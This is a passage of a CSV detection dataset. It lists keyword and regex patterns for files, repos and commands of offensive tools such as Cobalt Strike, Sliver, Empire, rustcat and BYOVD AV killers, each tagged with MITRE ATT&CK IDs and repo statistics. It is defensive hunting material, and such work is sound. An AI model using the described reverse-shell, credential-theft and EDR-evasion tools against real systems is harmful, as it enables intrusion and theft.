"*Bin\bin64\zlibwapi.dll*",".{0,1000}Bin\\bin64\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*bin\psexec_command.x64.o*",".{0,1000}bin\\psexec_command\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*bin\SillyRAT*",".{0,1000}bin\\SillyRAT.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 
tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin\void.zip*",".{0,1000}bin\\void\.zip.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin2mac.py *.bin*",".{0,1000}bin2mac\.py\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*binderlabs/DirCreate2System*",".{0,1000}binderlabs\/DirCreate2System.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*binderlabs/DirCreate2System*",".{0,1000}binderlabs\/DirCreate2System.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*binwalk -e image.png*",".{0,1000}binwalk\s\-e\simage\.png.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive 
tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*BishopFox/sliver*",".{0,1000}BishopFox\/sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bitb_server/phishing.ini*",".{0,1000}bitb_server\/phishing\.ini.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*bitcoin2john.py*",".{0,1000}bitcoin2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Bitmap-Elevate*",".{0,1000}Bitmap\-Elevate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*bitquark_top100k_sublist.txt*",".{0,1000}bitquark_top100k_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*bits_ntlm_token_impersonation.*",".{0,1000}bits_ntlm_token_impersonation\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bitsadmin/nopowershell*",".{0,1000}bitsadmin\/nopowershell.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*BitsadminStager*",".{0,1000}BitsadminStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bitshares2john.py*",".{0,1000}bitshares2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*bitwarden2john.py*",".{0,1000}bitwarden2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Biu-framework*",".{0,1000}Biu\-framework.{0,1000}","offensive_tool_keyword","Biu-framework","Biu-framework Security Scan Framework For Enterprise Intranet Based Services","T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Frameworks","https://awesomeopensource.com/project/0xbug/Biu-framework","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bkerberos_ccache_use*",".{0,1000}bkerberos_ccache_use.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkerberos_ticket_purge*",".{0,1000}bkerberos_ticket_purge.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkerberos_ticket_use*",".{0,1000}bkerberos_ticket_use.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkeylogger*",".{0,1000}bkeylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 
- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bks2john.py*",".{0,1000}bks2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*blackarch/tree/master/packages/rustcat*",".{0,1000}blackarch\/tree\/master\/packages\/rustcat.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*blackarrowsec/mssqlproxy*",".{0,1000}blackarrowsec\/mssqlproxy.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & 
Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*blackarrowsec/pivotnacci*",".{0,1000}blackarrowsec\/pivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*blackhat-arsenal-tools*",".{0,1000}blackhat\-arsenal\-tools.{0,1000}","offensive_tool_keyword","Github Username","This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readability. the tools are classified by category and not by session.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/toolswatch/blackhat-arsenal-tools","1","0","N/A","N/A","10","3725","1124","2023-10-11T11:20:59Z","2017-07-21T08:03:44Z" "*blacklanternsecurity/MANSPIDER*",".{0,1000}blacklanternsecurity\/MANSPIDER.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*blacklanternsecurity/trevorproxy*",".{0,1000}blacklanternsecurity\/trevorproxy.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*blacklanternsecurity/TREVORspray*",".{0,1000}blacklanternsecurity\/TREVORspray.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*Blackout.exe *",".{0,1000}Blackout\.exe\s.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*BlackSnufkin/GhostDriver*",".{0,1000}BlackSnufkin\/GhostDriver.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" 
"*BlackSnufkin/NovaLdr*",".{0,1000}BlackSnufkin\/NovaLdr.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*ble_recon.go*",".{0,1000}ble_recon\.go.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*blendin/3snake*",".{0,1000}blendin\/3snake.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*blindSQLPayloads.txt*",".{0,1000}blindSQLPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*blitz /* */etc/*",".{0,1000}blitz\s\/.{0,1000}\s.{0,1000}\/etc\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users 
behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*blitz -l",".{0,1000}blitz\s\-l","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*blitz -s *",".{0,1000}blitz\s\-s\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*blockchain2john.py*",".{0,1000}blockchain2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*blockdlls -*",".{0,1000}blockdlls\s\-.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*blockdlls 
start*",".{0,1000}blockdlls\sstart.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*blockdlls stop*",".{0,1000}blockdlls\sstop.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*blocketw.bin*",".{0,1000}blocketw\.bin.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*blocketw.csproj*",".{0,1000}blocketw\.csproj.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*blocketw.exe*",".{0,1000}blocketw\.exe.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*blocketw.pdb*",".{0,1000}blocketw\.pdb.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" 
"*BlockEtw-master*",".{0,1000}BlockEtw\-master.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*BlockNewProcClient.exe -*",".{0,1000}BlockNewProcClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*BlockNewProcDrv_x64.sys*",".{0,1000}BlockNewProcDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation 